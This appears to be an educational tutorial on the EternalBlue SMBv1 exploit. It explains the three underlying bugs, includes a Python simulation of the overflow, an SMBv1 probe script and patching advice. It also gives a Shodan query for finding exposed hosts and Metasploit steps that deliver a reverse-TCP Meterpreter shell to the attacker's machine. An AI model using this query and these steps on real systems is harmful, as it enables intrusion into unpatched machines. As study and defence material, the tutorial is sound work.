For educational purposes only.
Quick intro Eternal Blue 101
What is Eternal Blue?
EternalBlue, sometimes stylized as ETERNALBLUE, is an exploit developed by the U.S. National Security Agency (NSA), according to testimony by former NSA employees. It was leaked by the Shadow Brokers hacker group on April 14, 2017, and was used as part of the worldwide WannaCry ransomware attack on May 12, 2017. The exploit was also used to help carry out the NotPetya cyberattack on June 27, 2017, and was reported to be used by the Retefe banking trojan since at least September 5, 2017.
There are still a very large number of potentially vulnerable systems on the internet.
Shodan search to identify potentially unpatched and affected systems:
port:445 "SMB Version: 1" os:Windows !product:Samba
At the time of writing this query returned about 974,800 systems. Note that it matches only on the SMB version banner, not on patch level, so it cannot tell which of those hosts are actually still vulnerable.
Lab set up
In this lab I use the EternalBlue/DoublePulsar exploit module from GitHub and add it to the local Metasploit installation so that the exploit can deliver a Meterpreter shell.
Lab set up:
Windows 7 (x64) target
EternalBlue/DoublePulsar Metasploit exploit module from GitHub
Setting up Kali:
Download the EternalBlue/DoublePulsar exploit module from GitHub into the root directory
Add the module to your current Metasploit installation and reload the module cache (reload_all)
Install Wine and create a Wine prefix in the root directory (the module runs the leaked Windows exploit binaries through Wine)
Run an Nmap scan to confirm that TCP port 445 is open on the target; the smb-vuln-ms17-010 NSE script can additionally confirm that the host is unpatched.
Set up the payload:
set rhosts <target machine IP address>
set processinject lsass.exe (for an x64 target)
set targetarchitecture x64
set winepath <path to the Wine prefix created above, in the root directory>
set payload windows/x64/meterpreter/reverse_tcp
set lhost <Kali IP address>
leave the other options at their defaults
then run the exploit command
How does Eternal Blue work?
Eternal Blue relies on a bug in a Windows kernel function in the SMBv1 server driver, srv!SrvOs2FeaListSizeToNt. To see how this leads to remote code execution, let's take a quick look at how SMB works.
Server Message Block (SMB) is an application-layer network protocol mainly used to provide shared access to files, printers and serial ports, and for miscellaneous inter-process communication between nodes on a network.
Eternal Blue exploits three bugs:
The first is a size-calculation error when the server converts an OS/2 File Extended Attribute (FEA) list structure to an NT FEA list structure in order to work out how much memory to allocate. The conversion routine validates the OS/2 list entry by entry and, when it finds an entry that runs past the declared end of the list, writes the validated length back into the list's 32-bit size field; in the unpatched srv.sys that write is a 16-bit store, so the high word of the attacker-supplied size survives. The NT buffer is then allocated for the validated entries only, while the copy loop runs on to the larger, corrupted size. With more data being written than was allocated, the extra data overflows into adjacent memory.
Getting a FEA list large enough for that high word to matter (64 KiB or more) relies on the second bug, which results from a difference in the SMB protocol's definition of two related sub-commands: SMB_COM_TRANSACTION2 and SMB_COM_NT_TRANSACT. Both have a _SECONDARY command that is used when there is too much data to include in a single packet. The crucial difference between TRANSACTION2 and NT_TRANSACT is that the latter allows a much larger data payload: its length fields are 32-bit, whereas TRANSACTION2 is limited to 16-bit lengths. This matters because an error in validation occurs if the client sends a crafted message using the NT_TRANSACT sub-command immediately before the TRANSACTION2 one. While the server recognises that two separate sub-commands have been received, it tracks the transaction by its identifiers rather than by command type, so the TRANSACTION2_SECONDARY packets are accepted into the larger transaction that the NT_TRANSACT request created, and the completed transaction is then handled as a TRANSACTION2 request. The attacker can therefore deliver a FEA list larger than any real TRANSACTION2 could express to the vulnerable conversion routine.
Once the attackers achieve this initial overflow, they take advantage of a third weakness in SMBv1 to groom the kernel non-paged pool: by opening further SMB connections they can place receive buffers of a chosen size at predictable positions, so that the overflow overwrites the header of a neighbouring srvnet buffer rather than random memory. From there the attacker can redirect execution into shellcode and take control of the system.
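To make the first bug concrete, here is a small Python model of the size calculation and conversion described above. This is an added example written for this page, not code from srv.sys or from the exploit: the structure layouts follow the documented OS/2 FEA and FILE_FULL_EA_INFORMATION formats, the 4-byte rounding and the 16-bit store are modelled on the published analyses of the bug, and the input list (cbList = 0x10000, a run of well-formed filler entries, one over-long final entry) is constructed here purely to show the effect. Setting patched=True replaces the 16-bit store with a full 32-bit one, which is enough to make the copy loop stop where validation stopped.

```python
import struct

# OS/2 FEA entry header: fEA flags (1), cbName (1), cbValue (2, little-endian).
# The name (cbName bytes plus a NUL) and the value (cbValue bytes) follow it.
FEA_HDR = struct.Struct("<BBH")
# FILE_FULL_EA_INFORMATION: NextEntryOffset (4), Flags (1), EaNameLength (1),
# EaValueLength (2) precede the name, so the fixed part of an NT entry is 8 bytes.
NT_EA_HDR_SIZE = 8


def long_align(n: int) -> int:
    """Round up to a multiple of 4, as the kernel does for each NT EA entry."""
    return (n + 3) & ~3


def os2_fea_list_size_to_nt(buf: bytearray, patched: bool) -> int:
    """Model of srv!SrvOs2FeaListSizeToNt.

    buf holds the OS/2 FEALIST as received from the client: a 4-byte cbList
    (total list size, attacker controlled) followed by FEA entries.  Returns
    the number of bytes the NT-format list will need.  When an entry runs past
    cbList, the function shrinks cbList to the validated length in place.
    """
    cb_list = struct.unpack_from("<I", buf, 0)[0]
    off, nt_size = 4, 0
    while off < cb_list:
        hdr_fits = off + FEA_HDR.size <= cb_list
        if hdr_fits:
            _flags, cb_name, cb_value = FEA_HDR.unpack_from(buf, off)
            entry_len = FEA_HDR.size + cb_name + 1 + cb_value
        if not hdr_fits or off + entry_len > cb_list:
            if patched:
                struct.pack_into("<I", buf, 0, off)           # full 32-bit store
            else:
                # The unpatched srv.sys emitted a 16-bit store here, so only the
                # low word of cbList is replaced and its high word survives.
                struct.pack_into("<H", buf, 0, off & 0xFFFF)  # bug, modelled on purpose
            break
        nt_size += long_align(NT_EA_HDR_SIZE + cb_name + 1 + cb_value)
        off += entry_len
    return nt_size


def os2_fea_list_to_nt(buf: bytearray, patched: bool) -> tuple:
    """Model of srv!SrvOs2FeaListToNt: size the NT list, allocate that much,
    then convert entries until the (possibly corrupted) cbList is reached.
    Returns (bytes allocated, bytes the conversion loop tries to write).
    """
    allocated = os2_fea_list_size_to_nt(buf, patched)
    cb_list = struct.unpack_from("<I", buf, 0)[0]   # re-read after the store
    off, attempted = 4, 0
    # The real loop has no second bounds check; the len(buf) guard only keeps
    # this model from reading past the packet (the kernel would carry on into
    # whatever pool memory follows it).
    while off < cb_list and off + FEA_HDR.size <= len(buf):
        _flags, cb_name, cb_value = FEA_HDR.unpack_from(buf, off)
        attempted += long_align(NT_EA_HDR_SIZE + cb_name + 1 + cb_value)
        off += FEA_HDR.size + cb_name + 1 + cb_value
    return allocated, attempted


def overflow_bytes(fea_list: bytes, patched: bool) -> int:
    """Bytes written beyond the allocation (0 means no overflow)."""
    allocated, attempted = os2_fea_list_to_nt(bytearray(fea_list), patched)
    return max(0, attempted - allocated)


def build_sample_fea_list() -> bytes:
    """Constructed input (not the exploit's real packet): cbList = 0x10000,
    8175 well-formed 8-byte entries, then one entry whose cbValue runs past
    the end of the list.  The whole buffer is exactly 0x10000 bytes."""
    filler = FEA_HDR.pack(0, 3, 0) + b"abc\x00"       # 8 bytes each, NT size 12
    body = filler * 8175                              # fillers end at offset 0xFF7C
    bad = FEA_HDR.pack(0, 0, 0xFF00) + b"A" * 0x80    # claims 0xFF00 value bytes
    fea_list = struct.pack("<I", 0x10000) + body + bad
    assert len(fea_list) == 0x10000
    return fea_list


if __name__ == "__main__":
    sample = build_sample_fea_list()
    for patched in (False, True):
        alloc, attempted = os2_fea_list_to_nt(bytearray(sample), patched)
        print(f"patched={patched}: allocated {alloc:#x}, loop writes {attempted:#x}, "
              f"overflow {overflow_bytes(sample, patched):#x}")
```

On the unpatched path the model allocates 98,100 bytes (0x17F34) but the loop tries to write 163,392 (0x27E40): the corrupted cbList comes out as 0x1FF7C, larger than the 0x10000 the client sent, because the high word of the original value survived the 16-bit store. With patched=True cbList becomes 0xFF7C and the loop stops exactly where validation did. The real exploit picks its sizes so that the excess lands on the header of a neighbouring pool buffer, which is where the pool grooming described as the third bug comes in.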
The exploit module used here targets every unpatched Windows version from Windows 7 downwards: Windows XP (all service packs) (x86) (x64), Windows Server 2003 SP0 (x86), Windows Server 2003 SP1/SP2 (x86), Windows Server 2003 (x64), Windows Vista (x86) (x64), Windows Server 2008 (x86), Windows Server 2008 R2 (x64) and Windows 7 (all service packs) (x86) (x64). The underlying vulnerability, MS17-010, also affects unpatched Windows 8.1, Windows 10 and Windows Server 2012/2016, but those systems are not in this module's target list.
How to stay secure from Eternal Blue
Apply the Microsoft update MS17-010 (March 2017) wherever possible. Where a system cannot be patched, disabling SMBv1 removes the vulnerable code path, and blocking TCP port 445 (and 139) from untrusted networks reduces the exposure; both are worth doing on patched systems as well.
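Both the check in the lab setup (is port 445 on the target really speaking SMBv1?) and the check after hardening (is SMBv1 really off now?) come down to the same protocol exchange: send an SMB_COM_NEGOTIATE that offers only an SMB1 dialect and see whether the server accepts it. The following Python is an added example for this page, not part of the original post, of Metasploit or of the exploit module. It builds the request from the documented SMB1 header layout, classifies the reply, and includes a constructed reply from an SMBv1-enabled server so the parser can be exercised offline; probe_smb1() does the live exchange and should only be pointed at hosts you are authorised to test.

```python
import socket
import struct

SMB1_MAGIC = b"\xffSMB"
SMB2_MAGIC = b"\xfeSMB"
SMB_COM_NEGOTIATE = 0x72
NT_LM_012 = b"NT LM 0.12"   # the SMB1 dialect Windows 2000 and later actually use

# SMB1 header (32 bytes): Protocol, Command, Status, Flags, Flags2, PIDHigh,
# SecurityFeatures, Reserved, TID, PID, UID, MID.
SMB1_HEADER = struct.Struct("<4sBIBHHQHHHHH")


def build_smb1_negotiate(dialects=(NT_LM_012,)) -> bytes:
    """SMB_COM_NEGOTIATE request offering only SMB1 dialects, wrapped in a
    NetBIOS session header.  A server with SMBv1 disabled cannot accept any
    of these and will either close the connection or answer with SMB2."""
    header = SMB1_HEADER.pack(
        SMB1_MAGIC, SMB_COM_NEGOTIATE,
        0,            # NT status (request)
        0x18,         # Flags: canonical pathnames, case-insensitive
        0xC853,       # Flags2: unicode, NT status codes, extended security, long names
        0, 0, 0,      # PIDHigh, SecurityFeatures, Reserved
        0, 0xFEFF, 0, 0,   # TID, PID (arbitrary), UID, MID
    )
    data = b"".join(b"\x02" + d + b"\x00" for d in dialects)   # dialect strings
    body = struct.pack("<BH", 0, len(data)) + data             # WordCount 0, ByteCount
    smb = header + body
    return b"\x00" + len(smb).to_bytes(3, "big") + smb         # NetBIOS session message


def parse_negotiate_response(data: bytes) -> dict:
    """Classify the server's reply to build_smb1_negotiate().  data is the
    raw TCP reply including the 4-byte NetBIOS session header."""
    if len(data) < 8:
        return {"smb1": False, "reason": "no SMB reply (connection closed or empty)"}
    length = int.from_bytes(data[1:4], "big")
    smb = data[4:4 + length]
    if smb[:4] == SMB2_MAGIC:
        return {"smb1": False, "reason": "server answered with SMB2/3 only"}
    if smb[:4] != SMB1_MAGIC or len(smb) < 35:
        return {"smb1": False, "reason": "not an SMB1 negotiate response"}
    status = struct.unpack_from("<I", smb, 5)[0]
    word_count = smb[32]
    # First parameter word of the response is DialectIndex; 0xFFFF = none accepted.
    dialect_index = struct.unpack_from("<H", smb, 33)[0] if word_count else 0xFFFF
    accepted = status == 0 and dialect_index != 0xFFFF
    return {
        "smb1": accepted,
        "status": status,
        "dialect_index": dialect_index,
        "reason": "SMB1 dialect accepted" if accepted else "no SMB1 dialect accepted",
    }


def probe_smb1(host: str, port: int = 445, timeout: float = 5.0) -> dict:
    """Connect to host:port, send the SMB1 negotiate and classify the reply.
    Only run this against hosts you are authorised to test."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(build_smb1_negotiate())
            reply = s.recv(4096)
    except OSError as exc:
        return {"smb1": False, "reason": f"connection failed: {exc}"}
    return parse_negotiate_response(reply)


def sample_smb1_reply() -> bytes:
    """Constructed reply (not a real capture) from an SMBv1-enabled server:
    NT LM 0.12, the only dialect offered, is accepted as index 0."""
    header = SMB1_HEADER.pack(SMB1_MAGIC, SMB_COM_NEGOTIATE, 0, 0x98, 0xC853,
                              0, 0, 0, 0, 0xFEFF, 0, 0)
    words = struct.pack("<H", 0) + b"\x00" * 32     # DialectIndex + 16 further words
    body = bytes([17]) + words + struct.pack("<H", 0)  # WordCount 17, ByteCount 0
    smb = header + body
    return b"\x00" + len(smb).to_bytes(3, "big") + smb


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else None
    result = probe_smb1(target) if target else parse_negotiate_response(sample_smb1_reply())
    print("SMBv1 enabled" if result["smb1"] else "SMBv1 not offered", "-", result["reason"])
```

A host that returns an SMB1 negotiate response with a valid dialect index still has SMBv1 enabled; a closed connection or an SMB2 reply means the SMB1 code path is off. This says nothing about patch state: an SMBv1-enabled host may well have MS17-010 installed, which is the same distinction the Shodan count above cannot make. For that, use Nmap's smb-vuln-ms17-010 script, which goes one step further and issues the TRANS2 SESSION_SETUP request whose error code differs between patched and unpatched servers.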